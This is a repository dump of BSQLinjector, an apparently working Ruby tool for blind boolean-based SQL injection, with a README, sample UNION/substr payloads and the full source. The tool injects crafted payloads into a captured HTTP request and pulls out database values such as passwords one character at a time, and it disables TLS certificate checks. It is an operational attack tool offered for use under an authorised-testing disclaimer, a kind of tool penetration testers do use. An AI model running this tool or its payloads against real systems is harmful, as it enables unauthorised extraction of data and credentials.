├── .gitignore ├── README.md └── BSQLinjector.rb /.gitignore: -------------------------------------------------------------------------------- 1 | *.txt 2 | -------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
## BSQLinjector

BSQLinjector uses a blind (boolean-based) method to retrieve data from SQL databases: every request asks the database one true/false question about one character of the target value, and the answer is read from whether the configured pattern appears in the response body or headers.
Use the `--test` switch to see exactly what the configured payload looks like before sending anything to the application.

## Options:
```
--file      Mandatory - File containing a valid HTTP request with the injection point marked as SQLINJECT. (--file=/tmp/req.txt)
--pattern   Mandatory - Pattern to look for (in the response body or headers) when the query is true. (--pattern=truestatement)
--prepend   Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,")
--append    How to end the payload, for example by commenting out the rest of the SQL statement. (--append='#)
--schar     Character placed around chars. Not used in hex mode. (--schar="'")
--2ndfile   File containing a valid HTTP request used for second-order exploitation. (--2ndfile=/tmp/2ndreq.txt)

--mode      Blind mode to use - between - b (default; fewer requests), moreless - a (fewer requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce). (--mode=l)
--postgres  Use the postgres "for" form in the substring function (e.g. from 1 for 1).
--hex       Compare against hex values instead of quoted characters.
--case      Case sensitivity (also enumerates uppercase letters).

--ssl       Use SSL/TLS. Note: the target's certificate is NOT verified, so anything in the request file (session cookies, credentials) is exposed to a man-in-the-middle on the path to the target; go through a trusted proxy (--proxy) when that matters.
--proxy     Proxy to use. (--proxy=127.0.0.1:8080)

--test      Enable test mode. Do not send a request, just show the full payload.
--special   Include all special characters in enumeration.
--start     Start enumeration from the specified character position. (--start=10)
--max       Maximum characters to enumerate.
(--max=10)
--timeout   Timeout in seconds when waiting for a response. (--timeout=20)
--sleep     Seconds to sleep between requests. (--sleep=5)
--only-final Stop showing each enumerated letter.
--comma     URL-encode the comma in the substring call (%2C).
--bracket   Brackets to close the substring function with. (--bracket="))")
--hexspace  Use a space instead of brackets to delimit hex values.
--verbose   Show verbose messages (the full request, headers and cookies included, for every probe).
```

## Example usage:
```
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
```

**Disclaimer**

This repository contains a tool developed strictly for educational purposes and for authorised security testing. Any misuse of the tool for illegal activities is strictly prohibited.

**Legal Notice**

It is important to understand and comply with all local laws and regulations related to cybersecurity and ethical hacking. Unauthorized access to computer systems, networks, or data is illegal and punishable by law. The developer of this repository is not responsible for any misuse of the tools contained herein.

By using the tools in this repository, you agree to use them responsibly and ethically. Always obtain explicit permission before testing or attempting to access any network, system, or data that does not belong to you.
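#!/usr/bin/env ruby

require 'uri'
require 'net/http'
require 'net/https'
require 'openssl'
require 'timeout'
require 'readline'

# CONFIGURE
$file = ""         # file with vulnerable HTTP request
$secfile = ""      # file with second request (2nd order)
$prepend = ""      # most of SQL statement
$append = ""       # how to end SQL statement

$proto = "http"    # protocol to use - http/https
$proxy = ""        # proxy host
$proxy_port = ""   # proxy port

# mode to use: between - b (default, fewest requests), moreless - a (fewer
# requests by comparing with "<", ">", "="), like - l (complete bruteforce
# with LIKE), equals - e (complete bruteforce with =)
$mode = "b"
$hex = "n"         # if hex should be used in comparing

$max = 1000        # maximum chars to enumerate
$search = ""       # what is the pattern to look for when query is TRUE

$for = "n"         # if postgres "for" should be used in substring
$comma = "n"       # if comma should be URL encoded
$oh = ""           # this character is used when opening string when comparing
$bracket = ")"     # substring ending brackets
$case = "n"        # setting case sensitivity
$hexbracket = "y"  # hex delimiter - bracket (y) or space (n)
$showletter = "y"  # if each enumerated letter should be shown

$verbose = "n"     # verbose messaging
$test = "n"        # test mode
# Timeout (seconds) for each request. The request code reads $time; the
# original kept this in a local `timeout` that nothing ever read, so
# --timeout was silently ignored and a stalled target hung the run.
$time = 20
$sleep = 0         # sleep between requests
alls = "n"         # if all special characters should be included in enumeration
run = 0            # parameter specifies if program should continue when always true condition is detected

$i = 0             # main counter for characters

# Value of a "--name=value" argument: everything after the first "=", so a
# payload or pattern that itself contains "=" is kept whole.
def optval(arg)
  arg.split("=", 2)[1].to_s
end

# Recognised option prefixes. Anything else is reported rather than silently
# ignored, so a typo such as --patern= no longer slips by.
KNOWN_OPTIONS = %w[
  --file= --ssl --proxy= --verbose --timeout= --comma --2ndfile= --max= --mode=
  --hex --schar= --case --start= --test --postgres --bracket= --special --sleep=
  --only-final --hexspace --pattern= --prepend= --append=
].freeze

# set all variables. Options are matched on their prefix (start_with?) rather
# than anywhere in the argument: the old include? matching meant a payload
# containing e.g. "--test" or "--ssl" would flip that switch.
ARGV.each do |arg|
  puts "[-] Unknown option ignored: #{arg}" unless KNOWN_OPTIONS.any? { |o| arg.start_with?(o) }
  $file = optval(arg) if arg.start_with?("--file=")
  $proto = "https" if arg.start_with?("--ssl")
  $proxy, $proxy_port = optval(arg).split(":", 2) if arg.start_with?("--proxy=")
  $verbose = "y" if arg.start_with?("--verbose")
  $time = Integer(optval(arg)) if arg.start_with?("--timeout=")
  $comma = "y" if arg.start_with?("--comma")
  $secfile = optval(arg) if arg.start_with?("--2ndfile=")
  $max = optval(arg).to_i if arg.start_with?("--max=")
  $mode = optval(arg) if arg.start_with?("--mode=")
  $hex = "y" if arg.start_with?("--hex")          # also switched on by --hexspace, as before
  $oh = optval(arg) if arg.start_with?("--schar=")
  $case = "y" if arg.start_with?("--case")
  $i = optval(arg).to_i - 1 if arg.start_with?("--start=")
  $test = "y" if arg.start_with?("--test")
  $for = "y" if arg.start_with?("--postgres")
  # Fix: this used to be `.to_i - 1`, which turned --bracket="))" into the
  # integer -1 and made every payload build raise TypeError.
  $bracket = optval(arg) if arg.start_with?("--bracket=")
  alls = "y" if arg.start_with?("--special")
  $sleep = Integer(optval(arg)) if arg.start_with?("--sleep=")
  $showletter = "n" if arg.start_with?("--only-final")
  $hexbracket = "n" if arg.start_with?("--hexspace")
  $search = optval(arg) if arg.start_with?("--pattern=")
  $prepend = optval(arg) if arg.start_with?("--prepend=")
  $append = optval(arg) if arg.start_with?("--append=")
end

# show main menu
if ARGV.size < 3 || $file == "" || ($search == "" && $test == "n")
  puts "BSQLinjector by Jakub Pa\u0142aczy\u0144ski"
  puts ""
  puts "BSQLinjector uses blind method to retrieve data from SQL databases."
  puts ""
  puts "Options:"
  puts "  --file        Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)"
  puts "  --pattern     Mandatory - Pattern to look for when query is true. (--pattern=truestatement)"
  puts "  --prepend     Mandatory - Main payload. (--prepend=\"abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,\""
  puts "  --append      How to end our payload. For example comment out rest of SQL statement. (--append='#)"
  puts "  --schar       Character placed around chars. This character is not used while in hex mode. (--schar=\"'\")"
  puts "  --2ndfile     File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)"
  puts ""
  puts "  --mode        Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using \"<\", \">\", \"=\" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)"
  puts "  --postgres    Use postgres \"for\" in substring function."
  puts "  --hex         Use hex to compare instead of characters."
  puts "  --case        Case sensitivity."
  puts ""
  puts "  --ssl         Use SSL. Note: the target certificate is not verified."
  puts "  --proxy       Proxy to use. (--proxy=127.0.0.1:8080)"
  puts ""
  puts "  --test        Enable test mode. Do not send request, just show full payload."
  puts "  --special     Include all special characters in enumeration."
  puts "  --start       Start enumeration from specified character. (--start=10)"
  puts "  --max         Maximum characters to enumerate. (--max=10)"
  puts "  --timeout     Timeout in waiting for responses. (--timeout=20)"
  puts "  --sleep       Sleep between requests. (--sleep=5)"
  puts "  --only-final  Stop showing each enumerated letter."
  puts "  --comma       Encode comma."
  puts "  --bracket     Add brackets to the end of substring function. --bracket=\"))\""
  puts "  --hexspace    Use space instead of brackets to split hex values."
  puts "  --verbose     Show verbose messages."
  puts ""
  puts "Example usage:"
  puts "  ruby #{__FILE__} --pattern=truestatement --file=/tmp/req.txt --schar=\"'\" --prepend=\"abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,\" --append=\"'#\" --ssl"
  puts ""
  exit(1)
else
  puts "BSQLinjector by Jakub Pa\u0142aczy\u0144ski"
  puts ""
end

# EXECUTION

# holds HTTP responses
$response = ""

# arrays for Blind exploitation - special characters; the full set is only
# tried with --special because every extra candidate costs a request
$arrs = [",", "_", "."]
if alls == "y"
  $arrs += ["+", "/", "=", ":", "-", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "~", "`", "[", "]", "{", "}", ";", "<", ">", "?", "|", "\\", "\""]
end
$arrn1 = %w[0 1 2 3 4]
$arrn2 = %w[5 6 7 8 9]

# lowercase letters in the groups the between/moreless search narrows down to
$arr1 = %w[a b c]
$arr2 = %w[d e f]
$arr3 = %w[g h i]
$arr4 = %w[j k l m]
$arr5 = %w[n o p]
$arr6 = %w[q r s]
$arr7 = %w[t u v]
$arr8 = %w[w x y z]

# for case sensitive
$arr9 = %w[A B C]
$arr10 = %w[D E F]
$arr11 = %w[G H I]
$arr12 = %w[J K L M]
$arr13 = %w[N O P]
$arr14 = %w[Q R S]
$arr15 = %w[T U V]
$arr16 = %w[W X Y Z]

# full candidate lists for the bruteforce modes (l / e)
$arrays = $arr1 + $arr2 + $arr3 + $arr4 + $arr5 + $arr6 + $arr7 + $arr8 + $arrn1 + $arrn2 + $arrs
$arraysc = $arr1 + $arr2 + $arr3 + $arr4 + $arr5 + $arr6 + $arr7 + $arr8 + $arr9 + $arr10 + $arr11 + $arr12 + $arr13 + $arr14 + $arr15 + $arr16 + $arrn1 + $arrn2 + $arrs

# other parameters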
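$result = ""

### Processing Request File ###

# Configure basic options

# set proxy (nil tells Net::HTTP to connect directly)
if $proxy == ""
  $proxy = nil
  $proxy_port = nil
end

# in hex mode values are sent as 0x../chr(), so no quoting character is used
if $hex == "y"
  $oh = ""
end

# Read the request template once. The original re-read the file from disk on
# every single line access, inside loops, for every probe.
begin
  $reqlines = File.readlines($file)
rescue SystemCallError, IOError => e
  puts "[-] Cannot read request file #{$file}: #{e.message}"
  exit(1)
end

# get connection host and port from the Host: header of the request template
$remote = ""
z = 1
loop do
  begin
    break if $reqlines[z].chomp.empty?
    if $reqlines[z].include?("Host: ")
      $remote = $reqlines[z].split(" ")[1]
      $port = ($proto == "http") ? 80 : 443
      if $remote.include?(":")
        $remote, port = $remote.split(":", 2)
        $port = port.to_i
      end
    end
  rescue
    # running off the end of the file (no blank line) or a malformed line
    puts "[-] Wrong HTTP file format."
    exit(1)
  end
  z = z + 1
end

# the original compared an unset (nil) $remote with "", so a template without
# a Host: header fell through to a confusing connection error later
if $remote.to_s.empty?
  puts "[-] Cannot retrieve hostname."
  exit(1)
end

# URL-encodes the characters of the comparison fragment that would otherwise
# break the surrounding query string or form body.
def encode_chars(chars)
  chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+")
end

# Full payload for the current position $i:
# prepend + position + ",1" (length) + closing bracket(s) of substr() + comparison + append.
def build_payload(chars)
  position = if $comma == "y"
               "%2C1"
             elsif $for == "n"
               ",1"
             else
               " for 1"
             end
  $prepend + $i.to_s + position + $bracket + encode_chars(chars) + $append
end

# Replaces the SQLINJECT marker in `text` with `payload`.
# Returns [new_text, number_of_markers_seen]; the caller rejects anything
# other than exactly one marker across the whole request.
def inject(text, payload)
  n = text.scan("SQLINJECT").size
  [n.zero? ? text : text.sub("SQLINJECT", payload), n]
end

# Parses "Name: value" lines from lines[start] up to the blank line that ends
# the header section. Host: is skipped (Net::HTTP sets it from the connection
# target) and Accept-Encoding is dropped so the server answers uncompressed
# and the pattern can be searched in the raw body. When a block is given,
# every kept header line is passed through it first (payload injection).
# Returns [headers_hash, index_of_the_blank_line].
def read_headers(lines, start)
  headers = Hash.new
  i = start
  loop do
    line = lines[i]
    break if line.nil? || line.chomp.empty?
    unless line.include?("Host: ")
      header = line.chomp
      header = yield(header) if block_given?
      unless header.include?("Accept-Encoding")
        # split at the first ": " only - values such as cookies may contain it
        name, value = header.split(": ", 2)
        headers[name] = value.to_s
      end
    end
    i = i + 1
  end
  [headers, i]
end

# A fresh Net::HTTP for the main and the second-order request, configured
# identically (proxy, TLS, timeouts).
def build_http
  http = Net::HTTP.new($remote, $port, $proxy, $proxy_port)
  if $proto == "https"
    http.use_ssl = true
    # Certificate verification is deliberately disabled: engagement targets
    # frequently present self-signed or mismatched certificates. The trade-off
    # is that anything in the request file (session cookies, credentials) can
    # be read or altered by a man-in-the-middle on the path to the target.
    # Route through a trusted proxy (--proxy) when that matters.
    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
  end
  if $time
    http.open_timeout = $time
    http.read_timeout = $time
  end
  http
end

# Configure main request: rebuilds $uri, $headers, $post and $request for the
# comparison fragment `chars` by replacing the single SQLINJECT marker in the
# request template. Exits with a message when the marker is missing or
# appears more than once.
def configreq(chars)
  payload = build_payload(chars)

  # test mode: show the payload and stop without touching the target
  if $test == "y"
    puts "Payload example:"
    puts payload
    exit(1)
  end

  lines = $reqlines
  found = 0

  # check HTTP method
  $method = lines[0].start_with?("GET ") ? "get" : "post"

  # request line (marker in the path or query string)
  path = lines[0].split(" ")[1]
  if path.nil?
    puts "[-] Wrong HTTP file format."
    exit(1)
  end
  $uri, n = inject(path, payload)
  found += n

  # headers (marker in e.g. a cookie or User-Agent)
  $headers, i = read_headers(lines, 1) do |header|
    header, n = inject(header, payload)
    found += n
    header
  end

  # POST body: everything after the blank line, newlines included
  $post = ""
  if $method == "post"
    $post, n = inject(lines.drop(i + 1).join, payload)
    found += n
    # update Content-Length header
    $headers["Content-Length"] = String($post.bytesize)
  end

  # detect injection point
  if found == 0
    puts "[-] Please specify injection point. Put \"SQLINJECT\" in place where payload should be injected."
    exit(1)
  elsif found > 1
    puts "[-] Multiple instances of injection point found. Please specify only one injection point."
    exit(1)
  end

  # configuring request
  $request = build_http
end

### End of Processing Request File ###

### Configure request for 2nd order case ###
if $secfile != ""
  begin
    seclines = File.readlines($secfile)
  rescue SystemCallError, IOError => e
    puts "[-] Cannot read second request file #{$secfile}: #{e.message}"
    exit(1)
  end
  if seclines.empty? || seclines[0].split(" ")[1].nil?
    puts "[-] Wrong HTTP file format."
    exit(1)
  end

  # check HTTP method of the second request
  $secmethod = seclines[0].start_with?("GET ") ? "get" : "post"

  # get URI path
  $securi = seclines[0].split(" ")[1]

  # get headers
  $secheaders, y = read_headers(seclines, 1)

  # get POST body. This used to be gated on $method - the primary request's
  # method, which is not even set until the first probe - so the second
  # request's body was never loaded.
  $secpost = ""
  $secpost = seclines.drop(y + 1).join if $secmethod == "post"

  # configuring 2nd request - sent to the same host/port as the main one;
  # the second file's own Host: header is not consulted
  $secrequest = build_http
end

### End of Processing 2nd Request File ###

# Stands in for a response when a probe was lost (timeout, connection error).
# It answers the two calls the matching code makes - body and to_hash - so
# the probe counts as "no match" instead of aborting the whole enumeration
# with a NoMethodError on a bare string.
EmptyResponse = Struct.new(:body) {
  def to_hash
    {}
  end
}

# Prints the request that is about to be sent. Headers are included, so
# --verbose output may carry session cookies - keep it out of shared logs.
def show_request(label, uri, headers, body)
  puts "[+] #{label}:"
  puts "#{$proto}://#{$remote}:#{$port}#{uri}"
  puts headers
  puts "\n"
  puts body
  puts "\n"
end

# Performs one HTTP exchange and returns the response, or an EmptyResponse
# when nothing usable came back. Both the connect and the exchange run under
# $time (nil = no limit), on top of Net::HTTP's own open/read timeouts.
def perform(http, method, uri, body, headers)
  response = EmptyResponse.new("")
  begin
    Timeout.timeout($time) do
      http.start do |r|
        response = (method == "post") ? r.post(uri, body, headers) : r.get(uri, headers)
      end
    end
  rescue Timeout::Error
    puts "[-] Timed out waiting for the response - treating this probe as no match."
  rescue SystemCallError, SocketError, IOError, OpenSSL::SSL::SSLError => e
    puts "[-] Request failed (#{e.class}: #{e.message}) - treating this probe as no match."
  end
  response
end

# Sending request
def sendreq
  sleep($sleep) if $sleep != 0
  show_request("Sending request", $uri, $headers, $post) if $verbose == "y"
  $response = perform($request, $method, $uri, $post, $headers)
end

# Sending second request (the one that triggers the stored payload)
def send2ndreq
  show_request("Sending second request", $securi, $secheaders, $secpost) if $verbose == "y"
  # uses the second file's own method; the original reused $method here
  $response = perform($secrequest, $secmethod, $securi, $secpost, $secheaders)
end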
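# create between payload - and the shared machinery for all comparison styles

# True when the last response says the comparison held: the pattern shows up
# in the body or in any header name or value.
def response_matches?
  return false unless $response.respond_to?(:body) && $response.respond_to?(:to_hash)
  return true if $response.body.to_s.include?($search)
  $response.to_hash.any? do |name, values|
    name.to_s.include?($search) || Array(values).any? { |v| v.to_s.include?($search) }
  end
end

# Sends the probe built from `chars` (plus the second-order request when one
# is configured). With `record` == "yes", a matching response appends
# `letter` to $result and sets $letter so the caller stops trying candidates.
def probe(chars, letter, record)
  configreq(chars)
  sendreq()
  send2ndreq() if $secfile != ""
  return unless record == "yes" && response_matches?
  $result = $result + letter
  puts "[+] Letter " + $i.to_s + " found: " + letter if $showletter == "y"
  $letter = 1
end

# "between a and b" comparison; c == "yes" records a as the found letter
def cbetween(a, b, c)
  chars =
    if $hex == "y"
      if $for == "y"
        "between chr(" + a.ord.to_s + ")and chr(" + b.ord.to_s + ")"
      elsif $hexbracket == "n"
        "between 0x" + a.unpack('H*')[0] + " and 0x" + b.unpack('H*')[0]
      else
        "between(0x" + a.unpack('H*')[0] + ")and(0x" + b.unpack('H*')[0] + ")"
      end
    else
      "between" + $oh + a + $oh + "and" + $oh + b
    end
  probe(chars, a, c)
end

# creating moreless payload: a is the operator (">=", "<=", "="), b the value
def cmoreless(a, b, c)
  chars =
    if $hex == "y"
      if $for == "y"
        # Fix: the original emitted a.ord here - the first byte of the
        # operator - so every postgres hex comparison tested the wrong value.
        a + " chr(" + b.ord.to_s + ")"
      elsif $hexbracket == "n"
        a + " 0x" + b.unpack('H*')[0]
      else
        a + "(0x" + b.unpack('H*')[0] + ")"
      end
    else
      a + $oh + b
    end
  probe(chars, b, c)
end

# creating like payload
def clike(a)
  chars =
    if $hex == "y"
      if $for == "y"
        "like chr(" + a.ord.to_s + ")"
      elsif $hexbracket == "n"
        "like 0x" + a.unpack('H*')[0]
      else
        "like(0x" + a.unpack('H*')[0] + ")"
      end
    else
      "like" + $oh + a
    end
  probe(chars, a, "yes")
end

# creating equal payload
def cequal(a)
  chars =
    if $hex == "y"
      if $for == "y"
        "=chr(" + a.ord.to_s + ")"
      elsif $hexbracket == "n"
        "=0x" + a.unpack('H*')[0]
      else
        "=(0x" + a.unpack('H*')[0] + ")"
      end
    else
      "=" + $oh + a
    end
  probe(chars, a, "yes")
end

# Walks a narrowing tree. An inner node is {range: [lo, hi], yes: ..., no: ...}:
# `probe_node` is called with the range (and whether this is the root) and the
# branch matching the response is followed. A leaf is an Array of candidates
# tried with `probe_leaf` one at a time until one is recorded. nil ends the walk.
def walk_tree(node, probe_node, probe_leaf, root = true)
  return if node.nil?
  if node.is_a?(Array)
    node.each do |ch|
      probe_leaf.call(ch)
      break if $letter == 1
    end
    return
  end
  probe_node.call(node[:range], root)
  walk_tree(response_matches? ? node[:yes] : node[:no], probe_node, probe_leaf, false)
end

# The letter tree used by modes b and a: halve the alphabet, then quarter it,
# then try the 3-4 letter groups one character at a time. The shape (and so
# the request sequence) is the one the original hand-written if/else ladder
# produced.
def letter_tree(g1, g2, g3, g4, g5, g6, g7, g8)
  {
    range: [g1.first, g8.last],
    yes: {
      range: [g1.first, g4.last],
      yes: {
        range: [g1.first, g2.last],
        yes: { range: [g1.first, g1.last], yes: g1, no: g2 },
        no:  { range: [g3.first, g3.last], yes: g3, no: g4 }
      },
      no: {
        range: [g5.first, g6.last],
        yes: { range: [g5.first, g5.last], yes: g5, no: g6 },
        no:  { range: [g7.first, g7.last], yes: g7, no: g8 }
      }
    },
    no: nil
  }
end

lower_tree = letter_tree($arr1, $arr2, $arr3, $arr4, $arr5, $arr6, $arr7, $arr8)
upper_tree = letter_tree($arr9, $arr10, $arr11, $arr12, $arr13, $arr14, $arr15, $arr16)
digit_tree = { range: ["0", "9"], yes: { range: ["0", "4"], yes: $arrn1, no: $arrn2 }, no: nil }

# mode b asks "between lo and hi"; mode a asks ">= lo" at the root and
# "<= hi" for every narrower range below it
between_node = ->(range, _root) { cbetween(range[0], range[1], "no") }
between_leaf = ->(ch) { cbetween(ch, ch, "yes") }
moreless_node = ->(range, root) { root ? cmoreless(">=", range[0], "no") : cmoreless("<=", range[1], "no") }
moreless_leaf = ->(ch) { cmoreless("=", ch, "yes") }

# an unknown mode used to probe nothing and then report "wrong pattern"
unless ["b", "a", "l", "e"].include?($mode)
  puts "[-] Unknown mode \"#{$mode}\". Use b (between), a (moreless), l (like) or e (equals)."
  exit(1)
end

# do enumeration - one character of the result per iteration
until $i >= $max do
  $i = $i + 1
  $letter = 0

  # five "a"s in a row almost always means the injected condition is always
  # true (the first candidate "matches" every time), so ask before burning
  # more requests
  if $result == "aaaaa" && run == 0
    puts "[-] It seems like your payload gives always true condition. Maybe you should try another parameter's value or different payload. Quit (Y/N)?\n"
    choice = Readline.readline("> ", true)
    break if choice == "y" || choice == "Y"
    run = 1
  end

  charset = ($case == "n") ? $arrays : $arraysc

  case $mode
  when "e"
    charset.each do |ch|
      cequal(ch)
      break if $letter == 1
    end
  when "l"
    # "%" and "_" are LIKE wildcards, so those two are compared with "=" instead
    charset.each do |ch|
      if ch != "%" && ch != "_"
        clike(ch)
      else
        cequal(ch)
      end
      break if $letter == 1
    end
  when "b"
    walk_tree(lower_tree, between_node, between_leaf)
    # uppercase - only when case-sensitive specified
    walk_tree(upper_tree, between_node, between_leaf) if $case == "y" && $letter == 0
    walk_tree(digit_tree, between_node, between_leaf) if $letter == 0
    # special characters are tried one by one
    walk_tree($arrs, between_node, between_leaf) if $letter == 0
  when "a"
    walk_tree(lower_tree, moreless_node, moreless_leaf)
    walk_tree(upper_tree, moreless_node, moreless_leaf) if $case == "y" && $letter == 0
    walk_tree(digit_tree, moreless_node, moreless_leaf) if $letter == 0
    walk_tree($arrs, moreless_node, moreless_leaf) if $letter == 0
  end

  # printing results - no candidate matched, so the value has ended (or the
  # pattern never matches at all)
  if $letter == 0
    if $result == ""
      puts "[-] No results. Probably wrong pattern."
    else
      puts "\n[+] Full result:\n" + $result
    end
    break
  end
end

# means that there are still chars to enumerate (--max reached)
if $letter == 1
  puts "\n[-] Retreving not finished:\n" + $result
end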